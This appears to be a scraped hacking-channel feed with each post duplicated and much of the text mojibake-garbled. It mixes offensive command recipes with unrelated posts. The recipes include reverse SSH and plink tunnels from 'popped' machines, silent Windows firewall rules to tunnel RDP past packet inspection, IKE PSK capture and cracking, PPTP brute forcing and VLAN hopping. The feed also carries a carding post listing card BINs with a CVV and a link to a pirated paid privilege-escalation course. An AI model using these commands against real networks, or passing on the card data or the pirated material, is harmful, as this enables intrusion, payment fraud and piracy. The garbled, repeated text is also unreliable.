β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Useful Networking tips :
+ Setting up an Ethernet bridge in Ubuntu/Kali Linux
# Install bridge-utils
sudo apt-get install bridge-utils
# Disable network-manager + firewall
# Configuration
ifconfig
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
ifconfig mybridge up
dhclient br0 on devices
sudo tcpdump -i mybridge
# adding routes
route add 192.168.1.0/24 gw 10.10.0.43
# Port Forwarding - accept traffic on a given IP address and port andredirect it to a different IP address and port
apt-get install rinetd
cat /etc/rinetd.conf
\# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80
# SSH Local Port Forwarding: supports bi-directional communication channels
ssh <gateway> -L <local port to listen>:<remotehost>:<remote port>
# SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local
attacking box to tunnel ALL incoming traffic to ANY host in the DMZ
network on ANY PORT
ssh -D <local proxy port> -p <remote port><target>
# Proxychains - Perform nmap scan within a DMZ from an external computer
# Create reverse SSH tunnel from Popped machine on :2222
ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com
ssh -f -N -R 2222:<local host>:22 root@<remote host>
# Create a Dynamic application-level port forward on 8080 thru 2222
ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>
# Leverage the SSH SOCKS server to perform Nmap scan on network using proxy chains
proxychains nmap --top-ports=20 -sT -Pn $ip/24
# HTTP Tunneling
nc -vvn $ip 8888
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Useful Networking tips :
+ Setting up an Ethernet bridge in Ubuntu/Kali Linux
# Install bridge-utils
sudo apt-get install bridge-utils
# Disable network-manager + firewall
# Configuration
ifconfig
ifconfig eth0 0.0.0.0
ifconfig eth1 0.0.0.0
brctl addbr br0
brctl addif br0 eth0
brctl addif br0 eth1
ifconfig mybridge up
dhclient br0 on devices
sudo tcpdump -i mybridge
# adding routes
route add 192.168.1.0/24 gw 10.10.0.43
# Port Forwarding - accept traffic on a given IP address and port andredirect it to a different IP address and port
apt-get install rinetd
cat /etc/rinetd.conf
\# bindadress bindport connectaddress connectport
w.x.y.z 53 a.b.c.d 80
# SSH Local Port Forwarding: supports bi-directional communication channels
ssh <gateway> -L <local port to listen>:<remotehost>:<remote port>
# SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local
attacking box to tunnel ALL incoming traffic to ANY host in the DMZ
network on ANY PORT
ssh -D <local proxy port> -p <remote port><target>
# Proxychains - Perform nmap scan within a DMZ from an external computer
# Create reverse SSH tunnel from Popped machine on :2222
ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com
ssh -f -N -R 2222:<local host>:22 root@<remote host>
# Create a Dynamic application-level port forward on 8080 thru 2222
ssh -f -N -D <local host>:8080 -p 2222 hax0r@<remote host>
# Leverage the SSH SOCKS server to perform Nmap scan on network using proxy chains
proxychains nmap --top-ports=20 -sT -Pn $ip/24
# HTTP Tunneling
nc -vvn $ip 8888
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Traffic Encapsulation - Bypassing deep packet inspection :
http tunnel
On server side:
sudo hts -F <server ip addr>:<port of your app> 80
On client side:
sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel
# Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network
Tunnel on port 22
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>
# Port 22 blocked? Try port 80? or 443?
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80
# Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection)
# Windows machine add required firewall rules without prompting the user
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
# Start the http tunnel client
httptunnel_client.exe
# Create HTTP reverse shell by connecting to localhost port 3000
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦ Traffic Encapsulation - Bypassing deep packet inspection :
http tunnel
On server side:
sudo hts -F <server ip addr>:<port of your app> 80
On client side:
sudo htc -P <my proxy.com:proxy port> -F <port of your app> <server ip addr>:80 stunnel
# Tunnel Remote Desktop (RDP) from a Popped Windows machine to your network
Tunnel on port 22
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>
# Port 22 blocked? Try port 80? or 443?
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P80
# Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel (bypass deep packet inspection)
# Windows machine add required firewall rules without prompting the user
netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
# Start the http tunnel client
httptunnel_client.exe
# Create HTTP reverse shell by connecting to localhost port 3000
plink -l root -pw 23847sd98sdf987sf98732 -R 3389:<local host>:3389 <remote host> -P 3000
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦VPN HACKING METHODES & MORE
# VPN Hacking
- Identify VPN servers:
./udp-protocol-scanner.pl -p ike $ip
- Scan a range for VPN servers:
./udp-protocol-scanner.pl -p ike -f ip.txt
# Use IKEForce to enumerate or dictionary attack VPN servers:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
# Perform IKE VPN enumeration with IKEForce:
./ikeforce.py TARGET-IP Γ’β¬βe Γ’β¬βw wordlists/groupnames.dic
### Bruteforce IKE VPN using IKEForce:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
Use ike-scan to capture the PSK hash:
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
ike-scan Γ’β¬βM Γ’β¬βA Γ’β¬βn example\_group -P hash-file.txt TARGET-IP
Use psk-crack to crack the PSK hash
psk-crack hash-file.txt
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
# PPTP Hacking Identifying PPTP, it listens on TCP: 1723
NMAP PPTP Fingerprint:
nmap Γ’β¬βPn -sV -p 1723 TARGET(S)
PPTP Dictionary Attack
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
# VLAN Hopping
git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh`
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦VPN HACKING METHODES & MORE
# VPN Hacking
- Identify VPN servers:
./udp-protocol-scanner.pl -p ike $ip
- Scan a range for VPN servers:
./udp-protocol-scanner.pl -p ike -f ip.txt
# Use IKEForce to enumerate or dictionary attack VPN servers:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
# Perform IKE VPN enumeration with IKEForce:
./ikeforce.py TARGET-IP Γ’β¬βe Γ’β¬βw wordlists/groupnames.dic
### Bruteforce IKE VPN using IKEForce:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
Use ike-scan to capture the PSK hash:
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
ike-scan Γ’β¬βM Γ’β¬βA Γ’β¬βn example\_group -P hash-file.txt TARGET-IP
Use psk-crack to crack the PSK hash
psk-crack hash-file.txt
pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key
# PPTP Hacking Identifying PPTP, it listens on TCP: 1723
NMAP PPTP Fingerprint:
nmap Γ’β¬βPn -sV -p 1723 TARGET(S)
PPTP Dictionary Attack
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst
# VLAN Hopping
git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh`
enjoyβ€οΈππ»
β git topic
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - SpiderLabs/ikeforce
Contribute to SpiderLabs/ikeforce development by creating an account on GitHub.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The right steps for Information Gathering
1) Manually explore the site
2) Spider/crawl for missed or hidden content
3) Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
4) Check the caches of major search engines for publicly accessible sites
5) Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler)
6) Perform Web Application Fingerprinting
7) Identify technologies used
8) Identify user roles
9) Identify application entry points
10) Identify client-side code
11) Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)
12) Identify co-hosted and related applications
13) Identify all hostnames and ports
14) Identify third-party hosted content
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦The right steps for Information Gathering
1) Manually explore the site
2) Spider/crawl for missed or hidden content
3) Check for files that expose content, such as robots.txt, sitemap.xml, .DS_Store
4) Check the caches of major search engines for publicly accessible sites
5) Check for differences in content based on User Agent (eg, Mobile sites, access as a Search engine Crawler)
6) Perform Web Application Fingerprinting
7) Identify technologies used
8) Identify user roles
9) Identify application entry points
10) Identify client-side code
11) Identify multiple versions/channels (e.g. web, mobile web, mobile app, web services)
12) Identify co-hosted and related applications
13) Identify all hostnames and ports
14) Identify third-party hosted content
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Steps a good Configuration Management :
1) Check for commonly used application and administrative URLs
2) Check for old, backup and unreferenced files
3) Check HTTP methods supported and Cross Site Tracing (XST)
4) Test file extensions handling
5) Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
6) Test for policies (e.g. Flash, Silverlight, robots)
7) Test for non-production data in live environment, and vice-versa
8) Check for sensitive data in client-side code (e.g. API keys, credentials)
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Steps a good Configuration Management :
1) Check for commonly used application and administrative URLs
2) Check for old, backup and unreferenced files
3) Check HTTP methods supported and Cross Site Tracing (XST)
4) Test file extensions handling
5) Test for security HTTP headers (e.g. CSP, X-Frame-Options, HSTS)
6) Test for policies (e.g. Flash, Silverlight, robots)
7) Test for non-production data in live environment, and vice-versa
8) Check for sensitive data in client-side code (e.g. API keys, credentials)
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β
x3 Bins For Xbox Live
Bin : 519603203xxxxxx1
519603204xxxxxx2
5196032051xxxx00
Date: 22/07
CVV : 706
IP : USA πΊπΈ
only verified by Us
Bin : 519603203xxxxxx1
519603204xxxxxx2
5196032051xxxx00
Date: 22/07
CVV : 706
IP : USA πΊπΈ
only verified by Us
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Britain, the United States and Canada say that Russian intelligence agencies are trying to steal the new crown vaccine research results
#News
> The governments of the United Kingdom, the United States and Canada accused the Russian National Intelligence Agency of hacking into international pharmaceutical and academic research institutions with a view to winning the competition to develop the Covid-19 vaccine.
>It is unclear whether the research institute was damaged, or whether the vaccine project was blocked by hacking, but the above-mentioned national officials warned that cyber attacks are still in progress.
> The UKβs National Cyber Security Centre (NCSC) said in an unexpected statement on Thursday that vaccine and treatment departments in multiple countries have been targeted. However, the institution did not list the names and number of institutions affected by this.
> The United Kingdom refers to the hacking organization named APT29, saying it is "almost certainly" an integral part of the Russian national intelligence service. The group is also known as Cozy Bear or The Dukes, targeting vaccine development organizations in the United Kingdom, United States and Canada.
> According to NCSC, malicious activities have been ongoing, mainly aimed at government, diplomacy, think tanks, health and energy targets, aimed at stealing valuable intellectual property.
> Russia denied any involvement in hacking activities against the new coronavirus vaccine. Kremlin spokesman Dmitry Peskov told Bloomberg: "We don't know who might have hacked into pharmaceutical companies and research centers. We can only say that Russia has nothing to do with these attempts."
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Britain, the United States and Canada say that Russian intelligence agencies are trying to steal the new crown vaccine research results
#News
> The governments of the United Kingdom, the United States and Canada accused the Russian National Intelligence Agency of hacking into international pharmaceutical and academic research institutions with a view to winning the competition to develop the Covid-19 vaccine.
>It is unclear whether the research institute was damaged, or whether the vaccine project was blocked by hacking, but the above-mentioned national officials warned that cyber attacks are still in progress.
> The UKβs National Cyber Security Centre (NCSC) said in an unexpected statement on Thursday that vaccine and treatment departments in multiple countries have been targeted. However, the institution did not list the names and number of institutions affected by this.
> The United Kingdom refers to the hacking organization named APT29, saying it is "almost certainly" an integral part of the Russian national intelligence service. The group is also known as Cozy Bear or The Dukes, targeting vaccine development organizations in the United Kingdom, United States and Canada.
> According to NCSC, malicious activities have been ongoing, mainly aimed at government, diplomacy, think tanks, health and energy targets, aimed at stealing valuable intellectual property.
> Russia denied any involvement in hacking activities against the new coronavirus vaccine. Kremlin spokesman Dmitry Peskov told Bloomberg: "We don't know who might have hacked into pharmaceutical companies and research centers. We can only say that Russia has nothing to do with these attempts."
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from Backup Legal Mega
Paid guide LinuxPrivelegeEscalation Full by cybermentor:
https://mega.nz/folder/tLhlmKrD#5wrymtsKHTt1gBDLF8a1Sg -
https://mega.nz/folder/tLhlmKrD#5wrymtsKHTt1gBDLF8a1Sg -
mega.nz
File folder on MEGA
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦INTERESTING NEW BUG- DESCRIPTION :
> "WonderCMS is a free simple website builder. Aimed to be extremely easy
to install (1 step), light and simple to use.It's an open source flat
file CMS (Content Management System), built with PHP and developed
since 2008."
> Vulnerability overview/description:
-----------------------------------
1. Stored Cross Site Scripting via Filename (Authenticated user)
This vulnerability allows an authenticated user (admin) to upload files
with a malicious client side script as filename. It will be executed in
the browser of a user if he visits the manipulated URL.
2. Directory Traversal (Authenticated user)
This vulnerability allows an authenticated user (admin) to delete arbitrary
files via directory traversal on the operating system with the access rights
of the web server.
3. Upload of arbitrary files (Authenticated user)
It was identified that an authenticated user (admin) can bypass file type
checks and upload malicious files. In this specific case, arbitrary server
side PHP code such as web shells can be uploaded. As a result the attacker
can run arbitrary code on the server side with the privileges of the web
server. This could lead to a full system compromise.
π¦Proof of concept:
-----------------
1. Stored Cross Site Scripting via Filename (Authenticated user)
[ PoC has been removed as no patch is available and the vendor is unresponsive ]
2. Directory Traversal (Authenticated user)
[ PoC has been removed as no patch is available and the vendor is unresponsive ]
3. Upload of arbitrary files (Authenticated user)
[ PoC has been removed as no patch is available and the vendor is unresponsive ]
π¦Vulnerable / tested versions:
-----------------------------
WonderCMS version 3.0.7 has been tested, which was the latest version
available at the time of the test. Previous versions may also be affected.
On 18-05-2020, the vendor released a newer version 3.1.0. However, the latest
version are still vulnerable to the above vulnerabilities.
source deeepweb
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦INTERESTING NEW BUG- DESCRIPTION :
> "WonderCMS is a free simple website builder. Aimed to be extremely easy
to install (1 step), light and simple to use.It's an open source flat
file CMS (Content Management System), built with PHP and developed
since 2008."
> Vulnerability overview/description:
-----------------------------------
1. Stored Cross Site Scripting via Filename (Authenticated user)
This vulnerability allows an authenticated user (admin) to upload files
with a malicious client side script as filename. It will be executed in
the browser of a user if he visits the manipulated URL.
2. Directory Traversal (Authenticated user)
This vulnerability allows an authenticated user (admin) to delete arbitrary
files via directory traversal on the operating system with the access rights
of the web server.
3. Upload of arbitrary files (Authenticated user)
It was identified that an authenticated user (admin) can bypass file type
checks and upload malicious files. In this specific case, arbitrary server
side PHP code such as web shells can be uploaded. As a result the attacker
can run arbitrary code on the server side with the privileges of the web
server. This could lead to a full system compromise.
π¦Proof of concept:
-----------------
1. Stored Cross Site Scripting via Filename (Authenticated user)
[ PoC has been removed as no patch is available and the vendor is unresponsive ]
2. Directory Traversal (Authenticated user)
[ PoC has been removed as no patch is available and the vendor is unresponsive ]
3. Upload of arbitrary files (Authenticated user)
[ PoC has been removed as no patch is available and the vendor is unresponsive ]
π¦Vulnerable / tested versions:
-----------------------------
WonderCMS version 3.0.7 has been tested, which was the latest version
available at the time of the test. Previous versions may also be affected.
On 18-05-2020, the vendor released a newer version 3.1.0. However, the latest
version are still vulnerable to the above vulnerabilities.
source deeepweb
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MongoDB database backup and recovery
//The entire database is backed up to the specified directory
mongodump -h dbhost -d dbname -o dbdirectory
mongodump -h 192.168.0.1 -d mydatabase -o D:\bak
//Restore the entire library
mongodump -h dbhost -u user -p pass -d dbdirectory
mongorestore -h 192.168.0.2 -u βrootβ -p β123β D:\bak
ββββββββββββββ βββββββββββββ
//Only backup the table of mytable to the specified directory
mongodump -h dbhost -d dbname -c collectionname -o dbdirectory
mongodump -h 192.168.0.1 -d mydatabase -c mytable -o D:\bak\mytable
//Restore a single table
mongorestore -h 192.168.0.2 -d mydatabase D:\bak\mytable
βββββββββββββββββββββββ
// Can also be used mongoexport backs up a single table, but the file
mongoexport -h dbhost -d dbname -c collectionname -o dbdirectoryfile
mongoexport -h 192.168.0.1 -d mydatabase -c mytable -o E:\bak\mytable.bak
//Use mongoimport to restore the specified file to the library
mongoimport -h dbhost -d dbname -c collectionname -file
mongoimport -h 192.168.0.2 -d mydatabase -c mytable -file E:\bak\mytable.bak
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦MongoDB database backup and recovery
//The entire database is backed up to the specified directory
mongodump -h dbhost -d dbname -o dbdirectory
mongodump -h 192.168.0.1 -d mydatabase -o D:\bak
//Restore the entire library
mongodump -h dbhost -u user -p pass -d dbdirectory
mongorestore -h 192.168.0.2 -u βrootβ -p β123β D:\bak
ββββββββββββββ βββββββββββββ
//Only backup the table of mytable to the specified directory
mongodump -h dbhost -d dbname -c collectionname -o dbdirectory
mongodump -h 192.168.0.1 -d mydatabase -c mytable -o D:\bak\mytable
//Restore a single table
mongorestore -h 192.168.0.2 -d mydatabase D:\bak\mytable
βββββββββββββββββββββββ
// Can also be used mongoexport backs up a single table, but the file
mongoexport -h dbhost -d dbname -c collectionname -o dbdirectoryfile
mongoexport -h 192.168.0.1 -d mydatabase -c mytable -o E:\bak\mytable.bak
//Use mongoimport to restore the specified file to the library
mongoimport -h dbhost -d dbname -c collectionname -file
mongoimport -h 192.168.0.2 -d mydatabase -c mytable -file E:\bak\mytable.bak
β β β Uππ»βΊπ«Δπ¬πβ β β β